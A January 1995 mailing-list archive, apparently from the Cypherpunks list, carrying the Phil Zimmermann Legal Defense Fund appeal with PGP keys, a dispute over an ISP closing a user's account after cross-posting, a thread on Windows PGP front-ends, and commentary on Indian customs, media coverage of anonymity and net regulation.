Mziw9z4lclX0DCznLzcYXzRBHQXYHclcSsPCn6lXYugmPdT8t5OkoqzN8mdU1iuH /YQZ79q1Iv+kufa0A8ZJn+9R/QmQnbxiOPJPOJzHYivd/hui70wIwf2qjF2hAAUR tCVEZXJlayBTLiBaZWFuYWggPGR6ZWFuYWhAaG9sb25ldC5uZXQ+iQCVAwUQLw3z i0wIwf2qjF2hAQGvawP/RSkJ0YSZX0MpeBMjo2BS9Qbsxs9iIS7/J1UesbNmR4ST 686EwPcpIMjiERJ425gXthOC7Jb7+39epkJkgoeuQqzj5FpnklpaGgG/2oyNbMKt EdysgkcufQm7lYMx4r/EOdW/PvLPL7cFBkCbdYRxOGmhy+iLnYrVRLqVNLteluI= =VD2n - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw4n/EwIwf2qjF2hAQGcuQP/UtKXz0w3icEf3j094LpkOmr7t+miBcT4 9T0rsZ8UNz/Md7l4iY0sA929vU5IiZs58dTH0qiIVrFLf5qh0hzV+7edX6ARxccP ZSsdchd6g6LdRJn+s4QvOQT19TgcAGfW1p0lbVvDKGsh2+KmpQ4jHiLC3ugYq2x3 nqL4aY8dC4c= =L/Fy -----END PGP SIGNATURE----- ~~~ PGPBLUE 3.0 ... I don't see my signature anywhere on this "social contract" -- | Fidonet: Derek Zeanah 1:102/903 | Internet: Derek.Zeanah at f903.n102.z1.fidonet.org | via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899 From carolann at mm.com Sat Jan 7 00:56:30 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 00:56:30 PST Subject: I haven't read this response, until now! Message-ID: Dear All, I haven't seen the next two responses, yet they comprise all the responses that ten news groups had made as of this posting, in my newsreader here at MM.COM. I am told there are now more, yet I think it's kind of a moot point (david at winternet.com was the reporter). So I am going to import the text now and read it finally. I have read the text, and I giggle a little, at who sent it. Now you already have had the advantage of seeing copy by Mr. Horwath. Mr. Logajan didn't. And didn't for a number of days. Nor did anyone anyone else either. [teacher mode on] LOOK AT THE GROUPS MR. LOGAJAN IS RESPONDING TO. HE IS ONLY REPLYING TO ONE, NOT TEN GROUPS. AND, EITHER HE OR MR. HAS CENSORED NINE OTHER GROUPS FROM THEIR RIGHTFUL REPLIES. I DO BELIEVE, WHEN YOU LOOK AT MR. HORWATH'S PRIOR POSTING, I THINK YOU WILL FIND THAT HE DID TAMPER WITH THE POSTING. AND, WHAT YOU GET AS A LESSON HERE IS JUST WHY THE REMAILER PROGRAM IS IN TROUBLE. THERE JUST HAS TO BE PLAIN AND SIMPLE TRUST. MR. LOGAJAN IS UNDER THAT SIMPLE DELUSION, FOR THE MOMENT. YET AS CYPHERPUNKS, THERE IS A KIND OF AN UNSTATED UNDERSTANDING THAT WE DO NOT DO THIS TO OTHERS OR OURSELVES. [teacher mode off] Mr. Horwath at least owes Mr. Logajan an apology. For misrepresentation. Mr. Horwath owes nine newsgroups an apology. For telling them (through ommission) that mn.general is more important than they are. It was about this point I was on the list again. The damage was done, and now repairs were under way. Now, the third and last response I know of, to this point. From carolann at vortex.mm.com Fri Jan 6 23:26:26 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 1995 01:26:26 -0600 Subject: (fwd) Re: Phil Zimmermann Message-ID: <53ae08506afed0671ca88cb1b531a06e@NO-ID-FOUND.mhonarc.org> Path: vortex.mm.com!news2.mr.net!mr.net!umn.edu!spool.mu.edu!howland.reston.ans.net!pipex!uunet!winternet.com!icicle.winternet.com!carolann From: Carol Anne Braddock Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams Subject: Re: Phil Zimmermann Date: Mon, 2 Jan 1995 04:05:13 -0600 Organization: StarNet Communications, Inc Lines: 317 Message-ID: References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com> NNTP-Posting-Host: icicle.winternet.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII In-Reply-To: Please read, and help if you can. You can get PGP at my WWW HomePage. http://www.winternet.com/~carolann Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REGISTERED PGP KEY NO.0C91594D carolann at icicle.winternet.com finger carolann at winternet.com |more *********************************************************************** My WWW Homepage Page is at: http://www.winternet.com/~carolann On Fri, 30 Dec 1994, Michael Paul Johnson wrote: > Christopher W. Geib <72144.1426 at CompuServe.COM> writes: > > >Phil, > > >Could you repost here the address where we can send our support? > > > -----BEGIN PGP SIGNED MESSAGE----- > > > Phil Zimmermann Legal Defense Fund Appeal > > In November, 1976, Martin Hellman and Whitfield Diffie announced > their discovery of public-key cryptography by beginning their paper > with the sentence: "We stand today on the brink of a revolution in > cryptography." > > We stand today on the brink of an important battle in the > revolution they unleased. Philip Zimmermann, who encoded and released > the most popular and successful program to flow from that discovery, > Pretty Good Privacy ("PGP"), may be about to go to court. > > It has been over fourteen months now since Phil was first informed > that he was the subject of a grand jury investigation being mounted by > the San Jose, CA, office of US Customs into the international > distribution, over the Internet, of the original version of the > program. On January 12th, Phil's legal team will meet for the first > time with William Keane, Assistant US Attorney for the Northern > District of California, who is in charge of the grand jury > investigation, in San Jose. An indictment, if one is pursued by the > government after this meeting, could be handed down very shortly > thereafter. > > If indicted, Phil would likely be charged with violating statute 22 > USC 2778 of the US Code, "Control of arms exports and imports." This > is the federal statute behind the regulation known as ITAR, > "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of > the Code of Federal Regulations. Specifically, the indictment would > allege that Phil violated 22 USC 2778 by exporting an item listed as a > "munition" in 22 CFR 120.1 et seq. without having a license to do so. > That item is cryptographic software -- PGP. > > At stake, of course, is far more than establishing whether Phil > violated federal law or not. The case presents significant issues and > will establish legal precedent, a fact known to everyone involved. > According to his lead counsel, Phil Dubois, the US government hopes to > establish the proposition that anyone having anything at all to do with > an illegal export -- even someone like Phil, whose only involvement was > writing the program and making it available to US citizens and who has > no idea who actually exported it -- has committed a federal felony > offense. The government also hopes to establish the proposition that > posting a "munition" on a BBS or on the Internet is exportation. If > the government wins its case, the judgment will have a profound > chilling effect on the US software industry, on the free flow of > information on the emerging global networks, and in particular upon the > grassroots movement to put effective cryptography in the hands of > ordinary citizens. The US government will, in effect, resurrect > Checkpoint Charlie -- on the Information Superhighway. > > By now, most of us who are reading this know about Phil and the > case, whether by having the program and reading the doc files or by > seeing reports in the Wall Steet Journal, Time, Scientific American, > the New York Times, Wired, US News and World Report, and hundreds of > other news outlets; on Usenet groups like talk.crypto.politics or > alt.security.pgp; or by listening to Phil give talks such as the one he > gave at CFP '94 in Chicago. We know that PGP has made great strides > since version 1.0, and is now a sophisticated encryption and > key-management package which has become the de facto standard in both > micro and mainframe environments. We know that Phil and the PGP > development team successfully negotiated a commercial license with > Viacrypt, and, through the efforts of MIT, a noncommercial license for > PGP with RSA Data Security, the holders of the patent on the RSA > algorithm on which PGP is based, thus freeing the program from the > shadow of allegations of patent infringement. We know that programs > such as PGP represent one of our best bulwarks in the Information Age > against the intrusions of public and private information gatherers. We > know that PGP is a key tool in insuring that the "Information > Superhighway" will open the world to us, without opening us to the > world. > > What we may not all know is the price Phil has had to pay for his > courage and willingness to challenge the crypto status quo. For years > now Phil has been the point man in the ongoing campaign for freely > available effective cryptography for the everyday computer user. The > costs, personal and professional, to him have been great. He wrote the > original code for PGP 1.0 by sacrificing months of valuable time from > his consulting career and exhausting his savings. He continues to > devote large amounts of his time to testifying before Congress, doing > public speaking engagements around the world, and agitating for > "cryptography for the masses," largely at his own expense. He is now > working, still for free, on the next step in PGP technology, PGP Phone, > which will turn every PC with a sound card and a modem into a secure > telephone. And we know that, just last month, he was searched and > interrogated in the absence of counsel by US Customs officials upon his > return from a speaking tour in Europe. > > Phil's legal team consists of his lead counsel, Philip Dubois of > Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in > Washington, DC, first counsel for intelligence policy for the Justice > Department under President Carter; Eben Moglen, professor of law at > Columbia and Harvard Universities; Curt Karnow, a former assistant US > attorney and intellectual property law specialist at Landels, Ripley & > Diamond in San Francisco; and Thomas Nolan, noted criminal defense > attorney in Menlo Park. > > While this is a stellar legal team, what makes it even more > extraordinary is that several of its members have given their time for > free to Phil's case. Still, while their time has been donated so far, > other expenses -- travel, lodging, telephone, and other costs -- have > fallen to Phil. If the indictment is handed down, time and costs will > soar, and the members of the team currently working pro bono may no > longer be able to. Justice does not come cheap in this country, but > Phil deserves the best justice money can buy him. > > This is where you and I come in. Phil Dubois estimates that the > costs of the case, leaving aside the lawyers' fees, will run from > US$100,000 - $150,000. If Phil's team must charge for their services, > the total cost of the litigation may range as high as US$300,000. The > legal defense fund is already several thousand dollars in the red and > the airline tickets to San Jose haven't even been purchased yet. > > In September, 1993 I wrote a letter urging us all to support Phil, > shortly after the first subpoenas were issued by Customs. Today the > need is greater than ever, and I'm repeating the call. > > Phil has assumed the burden and risk of being the first to develop > truly effective tools with which we all might secure our communications > against prying eyes, in a political environment increasingly hostile to > such an idea -- an environment in which Clipper chips and digital > telephony bills are our own government's answer to our concerns. Now > is the time for us all to step forward and help shoulder that burden > with him. > > It is time more than ever. I call on all of us, both here in the > US and abroad, to help defend Phil and perhaps establish a > groundbreaking legal precedent. PGP now has an installed base of > hundreds of thousands of users. PGP works. It must -- no other > "crypto" package, of the hundreds available on the Internet and BBS's > worldwide, has ever been subjected to the governmental attention PGP > has. How much is PGP worth to you? How much is the complete security > of your thoughts, writings, ideas, communications, your life's work, > worth to you? The price of a retail application package?i Send it. > More? Send it. Whatever you can spare: send it. > > A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has > been established with Phil Dubois in Boulder. Donations will be > accepted in any reliable form, check, money order, or wire transfer, > and in any currency, as well as by credit card. > > You may give anonymously or not, but PLEASE - give generously. If > you admire PGP, what it was intended to do and the ideals which > animated its creation, express your support with a contribution to this > fund. > > * * * > > Here are the details: > > To send a check or money order by mail, make it payable, NOT to Phil > Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the > check or money order to the following address: > > Philip Dubois > 2305 Broadway > Boulder, CO USA 80304 > (Phone #: 303-444-3885) > > To send a wire transfer, your bank will need the following > information: > > Bank: VectraBank > Routing #: 107004365 > Account #: 0113830 > Account Name: "Philip L. Dubois, Attorney Trust Account" > > Now here's the neat bit. You can make a donation to the PZDF by > Internet mail on your VISA or MasterCard. Worried about snoopers > intercepting your e-mail? Don't worry -- use PGP. > > Simply compose a message in plain ASCII text giving the following: > the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank > name of your VISA or MasterCard; the name which appears on it; a tele- > phone number at which you can be reached in case of problems; the card > number; date of expiry; and, most important, the amount you wish to do- > nate. (Make this last item as large as possible.) Then use PGP to en- > crypt and ASCII-armor the message using Phil Dubois's public key, en- > closed below. (You can also sign the message if you like.) E-mail > the output file to Phil Dubois (dubois at csn.org). Please be sure to use > a "Subject:" line reading something like "Phil Zimmermann Defense Fund" > so he'll know to decrypt it right away. > > Bona fides: My relation to Phil Z. is that of a long-time user and > advocate of PGP and a personal friend. For over a year I moderated the > (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site > here at Loyola. I am in no way involved with the administration of the > PZDF. I volunteer my time on its behalf. > Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case. > He administers the PZDF. > To obtain a copy of my public key (with which you can verify the > signature on this doc), you have a number of options: > - Use the copy which I will append below. > - Send mail to me at hmiller at luc.edu with the "Subject:" line > reading "send pubkey" > - Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm > - Obtain it from an Internet PGP keyserver machine such as > pgp-public-keys at pgp.ai.mit.edu. Just send a mail message to this > address with the "Subject:" field "GET hmiller". Other keyserver > machines on the Net which accept the same message format (and > automatically synchronize keyrings with each other every 10 minutes or > so) include: > > pgp-public-keys at pgp.mit.edu > pgp-public-keys at demon.co.uk > pgp-public-keys at pgp.ox.ac.uk > pgp-public-keys at ext221.sra.co.jp > pgp-public-keys at kub.nl > pgp-public-keys at pgp.iastate.edu > pgp-public-keys at dsi.unimi.it > pgp-public-keys at pgp.dhp.com > > You can verify my public key by calling me at 312-338-2689 (home) > or 312-508-2727 (office) and letting me read you my key fingerprint > ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring). > I include it also in my .sig, below, if that's good enough for you. > You might also note that Phil Zimmermann has signed my public key. > Hopefully he is Node #1 in your Web-of-Trust! His key is available on > the net keyservers and in the 'keys.asc' file in the PGP distribution > packages. > Phil Dubois's pubkey can also be obtained from the keyservers, if > you prefer that source to the text below, and from 'keys.asc'. Phil Z. > has signed his key as well. > > Here is Phil Dubois's public key: > > - -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.7 > > mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8 > 5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR > rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR > tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE > uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF > i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN > dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw== > =5uit > - -----END PGP PUBLIC KEY BLOCK----- > > Here is my (Hugh Miller's) public key: > > - -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy7frrEAAAEEALzOAQt+eWHzXSDLRgJaQMQ7Uju1xrD9mXAZGAG1GmiTNjKl > wK68qOXrwJvnH1BmGtg8GGv53nTeabltpn5crsQVFm+0623M56/T7SOeUBWxxoa0 > vvqAA8sJ6ac1/MXY9KIgqxu8Mu6Qwf68C4OnwCbE7T71bi+fjdEdYC5Hk8UpAAUR > tB1IdWdoIE1pbGxlciA8aG1pbGxlckBsdWMuZWR1PokAlQMFEC7ryVNleYS4x6lm > 3QEBW6YD/2IOIZX9FOggNyemvPwM/EN86KW74ZGuYuTIfPCrvOMy8pFqfE33Bw93 > UkyIDj1Yh/nDlclEOO/J0tyngPn2BD2vMtaKIGRhVjnoxQc3BfzdjJ2nnHoFzAjz > 0MBxYthysmWYsyF8cQxST6LZLITKkf41dti8SVKYVRWIgkyub02HiQCVAwUQLt/F > oNEdYC5Hk8UpAQHD1wP9GdN9OHAKkIRsHeHy0wsEkI4Emb/bHiU+W59Zw7NPWsWF > 3WTT1z8GKNToQLUdysbbJuSSk3rD3F4SNGJ+KPjR4674pmEfCVVP8cQPXEl4a3Zs > xSLWNI6rG3muUAfLdyZiFP08NthOVlP2h1aOLCqIgkjEYMfQNEgkefBRJd6JywI= > =hWCA > - -----END PGP PUBLIC KEY BLOCK----- > > * * * > > This campaign letter will be posted in a number of Usenet groups. > I will also be turning it into a FAQ-formatted document, which will be > posted monthly in the relevant groups and which will be available by > anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If > you come upon, or up with, any other ways in which we can help raise funds > for Phil, drop me a line at hmiller at luc.edu and let me know, so that I > can put it in the FAQ. > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2 > pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX > z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B > Ah+LQNb01Xo= > =aW2m > -----END PGP SIGNATURE----- > > > > -- > Hugh Miller, Ph.D. Voice: 312-508-2727 > Asst. Professor of Philosophy FAX: 312-508-2292 > Loyola University Chicago Home: 312-338-2689 > 6525 N. Sheridan Rd. E-mail: hmiller at luc.edu > Chicago, IL 60626 WWW: http://www.luc.edu/~hmiller > PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21 -- Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at vortex.mm.com Fri Jan 6 23:26:50 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 1995 01:26:50 -0600 Subject: (fwd) Re: Phil Zimmermann Message-ID: <283c371c68a89a4d2ae07bc0ed855b15@NO-ID-FOUND.mhonarc.org> Organization: Minnesota MicroNet, St. Paul, MN Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!drechsau From: drechsau at winternet.com (Mike Horwath) Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams Subject: Re: Phil Zimmermann Followup-To: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams Date: 5 Jan 1995 23:57:09 GMT Organization: StarNet Communications, Inc Lines: 12 Message-ID: <3ei10l$mvo at blackice.winternet.com> References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com> NNTP-Posting-Host: icicle.winternet.com X-Newsreader: TIN [version 1.2 PL2] We wish to apologize for Carol Anne's actions while with Winternet. This account has been deleted for breach of our AUP. Questions, comments, problems or general bitching, please reply to this message. -- Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com Winternet: info at winternet.com root at jacobs.mn.org <- Linux! Twin Cities area Internet Access: 612-941-9177 for more info Founding member of Minnesota Coalition for Internet Accessibility -- Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at vortex.mm.com Fri Jan 6 23:26:51 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 1995 01:26:51 -0600 Subject: (fwd) Re: Phil Zimmermann Message-ID: <1e5cdf203746b1a0144dbaf6df3710d1@NO-ID-FOUND.mhonarc.org> Path: vortex.mm.com!news2.mr.net!mr.net!skypoint.com!jlogajan From: jlogajan at skypoint.com (John Logajan) Newsgroups: mn.general Subject: Re: Phil Zimmermann Date: 6 Jan 1995 05:09:12 GMT Organization: SkyPoint Communications, Inc. Lines: 13 Message-ID: <3eij9o$8nu at stratus.skypoint.net> Reply-To: jlogajan at skypoint.com NNTP-Posting-Host: mirage.skypoint.com X-Newsreader: TIN [version 1.2 PL2] Mike Horwath (drechsau at winternet.com) wrote: : We wish to apologize for Carol Anne's actions while with Winternet. : This account has been deleted for breach of our AUP. : Questions, comments, problems or general bitching, please reply to this : message. Since you are publicly accusing Carol Anne of "breach of our AUP", you better explain what horrible crime she committed. -- - John Logajan -- jlogajan at skypoint.com -- 612-633-0345 - - 4248 Hamline Ave; Arden Hills, Minnesota (MN) 55112 USA - - WWW URL = http://www.skypoint.com/subscribers/jlogajan - -- Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at vortex.mm.com Fri Jan 6 23:26:52 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 1995 01:26:52 -0600 Subject: (fwd) Re: Phil Zimmermann Message-ID: Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!news From: "Mr.Fish" Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams Subject: Re: Phil Zimmermann Date: 6 Jan 1995 05:39:51 GMT Organization: StarNet Communications, Inc Lines: 16 Message-ID: <3eil37$6a at blackice.winternet.com> References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com> <3ei10l$mvo at blackice.winternet.com> NNTP-Posting-Host: mwalleye.winternet.com > We wish to apologize for Carol Anne's actions while with Winternet. > > This account has been deleted for breach of our AUP. > > Questions, comments, problems or general bitching, please reply to this > message. > > -- > Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com Looking at the groups that you cross-posted, I sure as heck would like to know what she did to get kicked off?;) What the heck do you have to apologize for Mike? Unless you might of been involved too?;) I told you you've been working too hard. Come on now bud, give us the lowdown! -- Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 01:42:30 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 01:42:30 PST Subject: Nope, the Skypoint Newsreader didn't carry any of the 9 groups. Message-ID: Dear All, And, amazingly neither does MM.Com. And if I'm going to infer, I'd better go back and look at the facts on hand. No, Mr. Horwath's reader has up to 4,500 or so groups in it at any given moment. Here at MM.Com we only have 1,009 to be precise. So let us remind ourselves that this didn't even get "full" coverage in a lot of places. And, in some maybe none at all. So stay tuned, as the story of the anonymous remailer cartel works it's way into place. I have a chain.exe script in the winternet.files. Spose I could go net.rad and go get another from soda.berkeley or somewhere. Look remailers, meet somehwere face to face, shake hands, hug each other, cut a deal eyeball to eyeball, just do the best you can with what you've got. So remailer cartel 1.0 has a bug or two. So does all humanity. Even so did my logic for a minute or two (only). So go somewhere fun and sort it out. And write what wonderful "vacations" you having, as you all will be MAKING MONEY FAST, within hours after your glorious return to civilization. (even money says the anon server bounces this to somebody) And as I stated four postings ago. No Mr. Ste. Marie only ten, and as we saw in some cases only one. not hundreds or thousands, just a few. .1% One One Tenth of a Percent. And, one instance of One One Hundreth of a Percent. About as bad as the pentium bug story. And that's still an acceptable post in any group. Somebody uses PGP in any of those groups. They are my friends. I hope I can learn remailer procedure and code soon, it looks fun. Thanks for your time. Love Always, Carol Anne From RopeGun at calvino.alaska.net Sat Jan 7 01:59:39 1995 From: RopeGun at calvino.alaska.net (Oren Tanay) Date: Sat, 7 Jan 95 01:59:39 PST Subject: pgp shells for windows.... Message-ID: I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion that a shell for pgp is the most sensible approach using such a powerfull encryption program. I've searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to assume that the user has an above average understanding of the workings of pgp and all of its uses. At this point your probably thinking that I'm looking for an easy way to get around learning pgp the hard way, but I'm not... the whole idea of pgp is that privacy and security be available to anyone, using any platform. But ease of use was not really one of the features built into pgp. If anyone can refer me to a windows shell for pgp (for dummys :-) ) I would like to get a copy of it for distribution on the bullitin board nets... Was I to verbose? \\|||||||// | o o | Oren Tanay | J | RopeGun at alaska.net \--- www.alaska.net/~RopeGun/RopeGun.html "My Cat Can Eat A Whole WaterMelon" >From owner-cypherpunks Sat Jan 7 02:21:34 1995 From erc at s116.slcslip.indirect.com Sat Jan 7 02:12:51 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Sat, 7 Jan 95 02:12:51 PST Subject: pgp shells for windows.... In-Reply-To: Message-ID: > I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion > that a shell for pgp is the most sensible approach using such a powerfull encryption program. I've > searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to > assume that the user has an above average understanding of the workings of pgp and all of its uses. At > this point your probably thinking that I'm looking for an easy way to get around learning pgp the hard way, > but I'm not... the whole idea of pgp is that privacy and security be available to anyone, using any platform. > But ease of use was not really one of the features built into pgp. If anyone can refer me to a windows > shell for pgp (for dummys :-) ) I would like to get a copy of it for distribution on the bullitin board nets... Which ones have you looked at? -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From RopeGun at calvino.alaska.net Sat Jan 7 02:21:34 1995 From: RopeGun at calvino.alaska.net (Oren Tanay) Date: Sat, 7 Jan 95 02:21:34 PST Subject: pgp shells for windows.... Message-ID: winpgp2.6 was the most succesfull pgp shell I could find but the interface was stale and non descript. including the fact that when it executed the commands it opened a window and I was interfacing with the dos pgp interface, I found that a little redundant for a shell program; but then again I'm not sure if an interface with pgp can be done any other way. \\|||||||// | o o | Oren Tanay | J | RopeGun at alaska.net \--- www.alaska.net/~RopeGun/RopeGun.html "My Cat Can Eat A Whole WaterMelon" >From owner-cypherpunks Fri Jan 6 23:59:11 1995 From erc at s116.slcslip.indirect.com Sat Jan 7 02:32:20 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Sat, 7 Jan 95 02:32:20 PST Subject: pgp shells for windows.... In-Reply-To: Message-ID: > winpgp2.6 was the most succesfull pgp shell I could find but the interface > was stale and non descript. including the fact that when it executed the > commands it opened a window and I was interfacing with the dos pgp > interface, I found that a little redundant for a shell program; but then > again I'm not sure if an interface with pgp can be done any other way. Try ftp.netcom.com:/pub/ec/ecarp/pgpwind.zip - you might find it a bit more to your liking. There are others out there, and their authors will probably speak up :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From rishab at dxm.ernet.in Sat Jan 7 03:08:51 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 7 Jan 95 03:08:51 PST Subject: Compliance and lax Customs Message-ID: In India telco (and several other) laws are ridiculously outdated (see my "FREEdom on the Net in India" Electrosphere, WIRED 3.01), although our Customs are pretty techno-savvy, as they need to know prices off the cuff for all the goodies people try to smuggle in without duty. But we're quite adept here at ignoring many of the more inconvenient laws - I just bought myself a new 540 mb hard disk for the equivalent of $350, and none of the BBSes pay the required $50,000/year license fee. It's nice to know that the US Customs are catching up with the technical incompetence one sees in the LEAs here. But I guess American Cypherpunks are to compliant to attempt to take advantage of such things. In fact, there's been a noticeable slump in the mirroring of crypto from US-only ftp sites to Europe. Obviously Cypherpunks are far more law-abiding in _practice_ than the media would have us believe, based on what they _discuss_ ;-) ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Jan 7 03:08:58 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 7 Jan 95 03:08:58 PST Subject: SAN FRANCISCO EDITORIAL Message-ID: Sandy posted Martha "Spam" Siegel's SF Chronicle editorial. If it boiled anyone's blood quite enough to write a letter to the paper on both the author's background as well as the unconstitutionality of her 'solutions', I'd be happy to sign my name in support. BTW while paranoia is good for C'punks, I don't see a hidden plot in the recent media coverage of anonymity. The media likes 'hot' issues, and have flogged the other one - kiddie porn - to death. Everyone from Newsweek to The Economist mentioned pedophilia, simply because it grabs attention more than global K-12 projects conducted over the net, just as anonymity grabs more attention in relation to crime than to sexual abuse recovery groups. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Jan 7 03:09:04 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 7 Jan 95 03:09:04 PST Subject: Law and ethics on the Net Message-ID: > ABA SCI/TECH SECTION, IPPP COMMITTEE > LAW AND ETHICS ON THE "NETS" > December 8, 1994 I've been on the Cypherpunk's mailing list for about half its lifetime, am a technology consultant based in New Delhi, do a weekly column on information society which has covered many of the issues you seem interested in, and write for WIRED magazine. I am interested in law and ethics in cyberspace, and would like to participate in your project, as long as it is not primarily intended to culminate in a set of guidelines for legislation, which I believe to be pointless. I'm including here some comments to your original announcement, which I only saw today. > The development of a national information infrastructure and > a global electronic network, of which Internet is the backbone, has > presented a multitude of legal and ethical problems involving use > and abuse of the networks, nationally and worldwide. Almost on a > daily basis, news items announce electronic network transmissions > constituting hate mail, profanity, vulgarity, obscenity, child > pornography, sexual harassment, defamation and invasion of privacy. Unfortunately, due to the way media works, we don't read of the benefits of total anonymity to participants in sexual abuse groups, human rights activists and many others. Going by what we read in the media, 93.5% of people on the Net are habitual child abusers, and 62% are nuclear-equipped narco-terrorists. > The violation of intellectual property rights and information > system security are also frequent occurrences. National and > international discussions consider such questions as what "rules of > the road" ought to apply, who can make them, how can they be > enforced, and what will be the legal and political relationships > between states and nations regarding cyberspace? It is argued that > at present the lawless, the intolerant and the disrespectful seem > able to pollute the worldwide information stream with little > constraint. Or free it from the monopoly of large media organizations. Ninety-five percent of the world's news is distributed by four agencies, who effectively shape our view of the world at large, and decide for us the crises du jour. The Net, _precisely_ because of its unregulated, bottom-up structure, allowed activists to communicate during the revolution in Chiapas, Mexico; got international agencies to offer support for the massive earthquake in Latur India at once, rather than wait for a 